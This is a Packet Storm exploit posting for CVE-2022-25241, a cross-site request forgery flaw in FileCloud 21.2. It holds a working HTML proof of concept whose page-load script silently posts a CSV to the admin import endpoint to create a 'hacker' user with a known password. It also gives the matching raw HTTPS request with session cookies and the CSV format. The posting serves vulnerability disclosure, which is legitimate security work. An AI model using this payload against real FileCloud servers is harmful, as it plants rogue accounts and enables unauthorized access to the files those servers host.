what you don't know can hurt you
Home Files News &[SERVICES_TAB]About Contact Add New

FileCloud 21.2 Cross Site Request Forgery

FileCloud 21.2 Cross Site Request Forgery
Posted Feb 21, 2022
Authored by Masashi Fujiwara

FileCloud version 21.2 suffers from a cross site request forgery vulnerability.

tags | exploit, csrf
advisories | CVE-2022-25241
SHA-256 | 416ed4585ffdeade05c15223afc7b591ef0cc08552298fcd8b219cac992f1ebf

FileCloud 21.2 Cross Site Request Forgery

Change Mirror Download
# Exploit Title: FileCloud 21.2 - Cross-Site Request Forgery (CSRF)
# Date: 2022-02-20
# Exploit Author: Masashi Fujiwara
# Vendor Homepage: https://www.filecloud.com/
# Software Link: https://hub.docker.com/r/filecloud/filecloudserver21.2
# Version: All versions of FileCloud prior to 21.3 (Fiexd: version 21.3.0.18447)
# Tested on:
# OS: Ubuntu 18.04.6 LTS (Docker)
# Apache: 2.4.52
# FileCloud: 21.2.4.17315
# CVE: CVE-2022-25241 (https://www.filecloud.com/supportdocs/fcdoc/latest/server/security-advisories/advisory-2022-01-3-threat-of-csrf-via-user-creation)

# Conditions
1. Only vulnerable if cookies have samesite set to None (SameSite=None).
echo 'define("TONIDOCLOUD_COOKIE_SAME_SITE_TYPE", "None");' >> /var/www/html/config/cloudconfig.php
2. Use https as target url (When cookies set SameSite=None, also set Secure).

# PoC (HTML)
<html>
<head>
<meta http-equiv="Pragma" content="no-cache">
<meta http-equiv="Cache-Control" content="no-cache">

<script>
function init(){
myFormData = new FormData();
let fileContent = new Blob(["UserName,EmailID,Password,DisplayName,Status,ExpirationDate,Groups,EmailVerified\nhacker,hacker@hacker.com,Password1,hacker,FULL,02/26/2222,Group1,YES\n"], {type: 'application/vnd.ms-excel'});
myFormData.append("uploadFormElement", fileContent, "user.csv");
fetch("https://192.168.159.129:8443/admin/?op=import&sendapprovalemail=0&sendpwdasplaintext=0", { method: "post", body: myFormData, credentials: "include"});
}
</script>
</head>
<body onload="init()">
CSRF PoC for CVE-2022-25241

Creat hacker user with Password1 via CSV file upload.
</body>
</html>



# HTTPS Request
POST /admin/?op=import&sendapprovalemail=0&sendpwdasplaintext=0 HTTP/1.1
Host: 192.168.159.129:8443
Cookie: X-XSRF-TOKEN-admin=rhedxvo0gullbvzkgwwv; X-XSRF-TOKEN=rhedxvo0gullbvzkgwwv; tonidocloud-au=admin; tonidocloud-as=29352577-cfaa-42e6-80e5-7a304bc78333; tonidocloud-ah=4514fb08f852d2682151efdb938d377734b1e493
Content-Length: 365
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/98.0.4758.102 Safari/537.36
Content-Type: multipart/form-data; boundary=----WebKitFormBoundaryiAXsUsJ2ZV54DFuW
Connection: close

------WebKitFormBoundaryiAXsUsJ2ZV54DFuW
Content-Disposition: form-data; name="uploadFormElement"; filename="user.csv"
Content-Type: application/vnd.ms-excel

UserName,EmailID,Password,DisplayName,Status,ExpirationDate,Groups,EmailVerified
hacker,hacker@hacker.com,Password1,hacker,FULL,02/26/2222,Group1,YES

------WebKitFormBoundaryiAXsUsJ2ZV54DFuW--



# CSV file format
UserName,EmailID,Password,DisplayName,Status,ExpirationDate,Groups,EmailVerified
hacker,hacker@hacker.com,Password1,hacker,FULL,02/26/2222,Group1,YES


Login or Register to add favorites

File Archive:

August 2022

  • Su
  • Mo
  • Tu
  • We
  • Th
  • Fr
  • Sa
  • 1
    Aug 1st
    20 Files
  • 2
    Aug 2nd
    4 Files
  • 3
    Aug 3rd
    6 Files
  • 4
    Aug 4th
    55 Files
  • 5
    Aug 5th
    16 Files
  • 6
    Aug 6th
    0 Files
  • 7
    Aug 7th
    0 Files
  • 8
    Aug 8th
    13 Files
  • 9
    Aug 9th
    13 Files
  • 10
    Aug 10th
    34 Files
  • 11
    Aug 11th
    16 Files
  • 12
    Aug 12th
    0 Files
  • 13
    Aug 13th
    0 Files
  • 14
    Aug 14th
    0 Files
  • 15
    Aug 15th
    0 Files
  • 16
    Aug 16th
    0 Files
  • 17
    Aug 17th
    0 Files
  • 18
    Aug 18th
    0 Files
  • 19
    Aug 19th
    0 Files
  • 20
    Aug 20th
    0 Files
  • 21
    Aug 21st
    0 Files
  • 22
    Aug 22nd
    0 Files
  • 23
    Aug 23rd
    0 Files
  • 24
    Aug 24th
    0 Files
  • 25
    Aug 25th
    0 Files
  • 26
    Aug 26th
    0 Files
  • 27
    Aug 27th
    0 Files
  • 28
    Aug 28th
    0 Files
  • 29
    Aug 29th
    0 Files
  • 30
    Aug 30th
    0 Files
  • 31
    Aug 31st
    0 Files

Top Authors In Last 30 Days

File Tags

Systems

packet storm

© 2022 Packet Storm. All rights reserved.

Hosting By
Rokasec
close